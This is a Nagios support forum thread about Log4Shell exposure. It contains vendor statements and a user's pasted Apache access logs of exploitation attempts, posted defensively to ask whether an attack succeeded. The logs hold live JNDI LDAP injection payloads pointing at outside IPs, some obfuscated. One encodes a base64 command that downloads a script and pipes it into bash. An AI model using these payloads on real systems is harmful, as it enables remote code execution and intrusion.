Log4Shell vulnerability

mejokj · Post by **mejokj** » Mon Dec 13, 2021 2:59 pm

Hi Team,

Is Nagios affected by Log4Shell vulnerability and if there is any security advisory for it.

Thanks

benjaminsmith · Post by **benjaminsmith** » Mon Dec 13, 2021 5:38 pm

HI mejokj,

Thanks for contacting the support team at Nagios.

We have an update with more information on this vulnerability on our company blog at:

https://www.nagios.com/news/2021/12/upd ... erability/

Regards,
Benjamin

mejokj · Post by **mejokj** » Tue Dec 14, 2021 12:45 pm

Thanks, Benjamin for the reply

We have gone through the document and understood that there is no impact discovered for Nagios still now.

And currently, there is nothing action required for the Log4j vulnerability? Right?

And how do we confirm from our side, anything we can chek

benjaminsmith · Post by **benjaminsmith** » Tue Dec 14, 2021 2:10 pm

Hi,

If you've installed any java based packages on your systems. My recommendation would be to reach out to your admins/security teams to search your systems for the impacted version of this package.

Regards,
Benjamin

DonForigua · Post by **DonForigua** » Tue Dec 14, 2021 6:54 pm

Hi seeing the apache logs i have

Code: Select all

167.71.13.196 - - [14/Dec/2021:10:15:44 -0500] "PUT ${jndi:ldap://167.71.13.196:9876/7b22536f7572636555726c223a22687474703a2f2f3139302e3134332e3130392e3137363a3830222c225061796c6f6164536f75726365223a22485454502d4745542
22c22497373756544617465223a22323032312d31322d31345431353a31353a34342e3535373734353039375a227d649eb0f26bf2b0c4880aca4a844a5cfb} HTTP/1.1\n" 400 226 "-" "-"                                                                
167.71.13.196 - - [14/Dec/2021:10:16:22 -0500] "PUT ${jndi:ldap://167.71.13.196:9876/7b22536f7572636555726c223a22687474703a2f2f3139302e3134332e3130392e3137363a3830222c225061796c6f6164536f75726365223a22485454502d4745542
22c22497373756544617465223a22323032312d31322d31345431353a31363a32322e3233343636373236355a227d7d83c441b293c5626d9493d671407547} HTTP/1.1\n" 400 226 "-" "-"                                                                
167.71.13.196 - - [14/Dec/2021:10:17:24 -0500] "PUT ${jndi:ldap://167.71.13.196:9876/7b22536f7572636555726c223a22687474703a2f2f3139302e3134332e3130392e3137363a3830222c225061796c6f6164536f75726365223a22485454502d4745542
22c22497373756544617465223a22323032312d31322d31345431353a31373a32342e3636373437363939345a227d755c304a1590c222821a248253a08e3d} HTTP/1.1\n" 400 226 "-" "-"                                                                
167.71.13.196 - - [14/Dec/2021:10:17:25 -0500] "PUT ${jndi:ldap://167.71.13.196:9876/7b22536f7572636555726c223a22687474703a2f2f3139302e3134332e3130392e3137363a3830222c225061796c6f6164536f75726365223a22485454502d4745542
22c22497373756544617465223a22323032312d31322d31345431353a31373a32352e3231363433333931395a227d9a7d3bb2ff411b9afaa13b4629c5b159} HTTP/1.1\n" 400 226 "-" "-"                                                                
195.54.160.149 - - [14/Dec/2021:16:28:45 -0500] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xOTAuMTQzLjEwOS4xNzY6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4N
zQvMTkwLjE0My4xMDkuMTc2OjgwKXxiYXNo} HTTP/1.1" 200 3245 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xOTAuMTQzLjEwOS4xNzY6ODB8fHdnZ
XQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTkwLjE0My4xMDkuMTc2OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8
xOTAuMTQzLjEwOS4xNzY6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTkwLjE0My4xMDkuMTc2OjgwKXxiYXNo}"

The last line has HTTP/1.1 200, was the attack sucessfull ?

gsmith · Post by **gsmith** » Wed Dec 15, 2021 1:59 pm

Hi

You need to work with your admins/security teams to assess any risk you may face.

Code: Select all

Nagios Enterprises takes data security and information integrity very seriously. Currently, we are evaluating our use of Apache products and our exposure to the vulnerability described in CVE-2021-44228.

We have updated our company blog with important information on this issue.

https://www.nagios.com/news/2021/12/update-on-apache-log4j-vulnerability/

While Nagios Core, NagiosXI, and Fusion use or depend upon Apache products they do not appear to be using vulnerable versions of the products as identified in the MITRE notification. While Nagios Log Server does use Log4j components and includes plugins for receiving Log4j data, we don't believe the product is vulnerable at this time. 

Due to the complexity and flexibility of our products and their ability to integrate into a wide variety of environments care should be taken to limit the exposure of systems to trusted entities.  

As always we also recommend that you keep your system up to date and follow the guidance of your operating system vendor and integrated application providers as is appropriate for your environment.

If we discover any vulnerabilities in Nagios software, we will immediately respond and release a fix ASAP. Please check our security page for updates.

https://www.nagios.com/products/security

Thank you

Nagios Support Forum

Log4Shell vulnerability

Log4Shell vulnerability

Re: Log4Shell vulnerability

Re: Log4Shell vulnerability

Re: Log4Shell vulnerability

Re: Log4Shell vulnerability

Re: Log4Shell vulnerability